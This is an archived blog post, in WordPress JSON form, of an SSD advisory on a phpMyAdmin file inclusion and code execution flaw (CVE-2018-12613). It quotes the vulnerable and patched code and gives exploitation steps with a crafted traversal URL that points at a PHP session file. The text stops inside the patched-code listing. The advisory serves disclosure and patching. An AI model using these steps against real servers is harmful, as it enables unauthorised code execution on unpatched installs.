{"id":12725,"date":"2018-07-02T14:19:13","date_gmt":"2018-07-02T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/07\/02\/news-6493\/"},"modified":"2018-07-02T14:19:13","modified_gmt":"2018-07-02T22:19:13","slug":"news-6493","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/07\/02\/news-6493\/","title":{"rendered":"SSD Advisory \u2013 phpMyAdmin File Inclusion and Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron | Date: Mon, 02 Jul 2018 12:19:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3700\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> Authenticated users can exploit a file inclusion vulnerability in phpMyAdmin which can then be combined with another vulnerability to perform Remote Code Execution. In addition, authenticated attackers can view files and execute PHP files located on the server by exploiting a bug in the part of the code that is responsible for redirects and loading of whitelisted pages.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vendor, phpMyAdmin, issued a fix on the 21st of June 2018.
Version 4.8.2 and newer aren&#8217;t affected.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-12613<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Henry Huang, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> phpMyAdmin 4.8.0 and 4.8.1 (running on Linux systems)<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The root cause of the vulnerability is in the <em>\/index.php<\/em> file, lines 54-63, which call the function Core::checkPageValidity located in <em>\/libraries\/classes\/Core.php<\/em>, lines 444-476:<\/p>\n<p>index.php:<\/p>\n<pre><code>if (! empty($_REQUEST['target'])\n    &amp;&amp; is_string($_REQUEST['target'])\n    &amp;&amp; ! preg_match('\/^index\/', $_REQUEST['target'])\n    &amp;&amp; ! in_array($_REQUEST['target'], $target_blacklist)\n    &amp;&amp; Core::checkPageValidity($_REQUEST['target'])\n) {\n    include $_REQUEST['target'];\n    exit;\n}<\/code><\/pre>\n<p>\/libraries\/classes\/Core.php:<\/p>\n<pre><code>public static function checkPageValidity(&amp;$page, array $whitelist = [])\n{\n    if (empty($whitelist)) {\n        $whitelist = self::$goto_whitelist;\n    }\n    if (! isset($page) || !is_string($page)) {\n        return false;\n    }\n\n    if (in_array($page, $whitelist)) {\n        return true;\n    }\n\n    $_page = mb_substr(\n        $page,\n        0,\n        mb_strpos($page . '?', '?')\n    );\n    if (in_array($_page, $whitelist)) {\n        return true;\n    }\n\n    $_page = urldecode($page);\n    $_page = mb_substr(\n        $_page,\n        0,\n        mb_strpos($_page . '?', '?')\n    );\n    if (in_array($_page, $whitelist)) {\n        return true;\n    }\n\n    return false;\n}<\/code><\/pre>\n<p>
<\/p>\n<p>The check that was added to prevent file inclusion is flawed: checkPageValidity compares only the part of the target before the first &#8216;?&#8217; (as received, and again after urldecode) against the whitelist, while include receives the full, undecoded string. A target that starts with a whitelisted page name followed by an encoded &#8216;?&#8217; is therefore accepted, which is what referencing &#8216;db_sql.php?&#8217; in the request achieves.<\/p>\n<p>Steps to exploit the vulnerabilities:<\/p>\n<ol>\n<li>Log in to phpMyAdmin<\/li>\n<li>Run an SQL query that contains the arbitrary PHP code, for example: <strong>select &#8216;&lt;?php phpcredits(); ?&gt;&#8217;<\/strong><\/li>\n<li>Take the session ID (it is the value of the <i>phpMyAdmin<\/i> cookie)<\/li>\n<li>Using this information, create a URL similar to this:<\/li>\n<\/ol>\n<pre><code>http:\/\/&lt;your domain or ip&gt;\/phpmyadmin\/index.php?target=db_sql.php%253f%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_skf209lf7h9gei97puae1829t4k1td4n<\/code><\/pre>\n<p><b>Result<\/b><br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3701\"
src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-300x168.png\" alt=\"\" width=\"1781\" height=\"1000\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-300x168.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-768x431.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-1024x575.png 1024w\" sizes=\"auto, (max-width: 1781px) 100vw, 1781px\" \/><\/a><\/p>\n<p>Let&#8217;s look at the patched code and understand how the issue was fixed.<\/p>\n<p>Index.php:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a08e609268547\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New 
Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if (! empty($_REQUEST[&#8216;target&#8217;])      &amp;&amp; is_string($_REQUEST[&#8216;target&#8217;])      &amp;&amp; ! preg_match(&#8216;\/^index\/&#8217;, $_REQUEST[&#8216;target&#8217;])      &amp;&amp; ! in_array($_REQUEST[&#8216;target&#8217;], $target_blacklist)      &amp;&amp; Core::checkPageValidity($_REQUEST[&#8216;target&#8217;], [], true)  ) {      include $_REQUEST[&#8216;target&#8217;];      exit;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-9\">9<\/div>\n<\/div>\n<\/td>\n<td 
class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-1\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">is_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">preg_match<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/^index\/&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">target_blacklist<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Core<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">checkPageValidity<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-6\"><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">include<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exit<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>Core.php:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a091706289721\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" 
title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> public static function checkPageValidity(&amp;$page, array $whitelist = [], $include = false)      {          if (empty($whitelist)) {              $whitelist = self::$goto_whitelist;          }          if (! isset($page) || !is_string($page)) {              return false;          }            if (in_array($page, $whitelist)) {              return true;          }          if ($include) {              return false;          }            $_page = mb_substr(              $page,              0,              mb_strpos($page . &#8216;?&#8217;, &#8216;?&#8217;)          );          if (in_array($_page, $whitelist)) {              return true;          }            $_page = urldecode($page);          $_page = mb_substr(              $_page,              0,              mb_strpos($_page . 
&#8216;?&#8217;, &#8216;?&#8217;)          );          if (in_array($_page, $whitelist)) {              return true;          }            return false;      }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" 
style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-1\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checkPageValidity<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">include<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">goto_whitelist<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">is_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span 
class=\"crayon-v\">include<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mb_substr<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mb_strpos<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-25\">&nbsp;<\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urldecode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mb_substr<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span 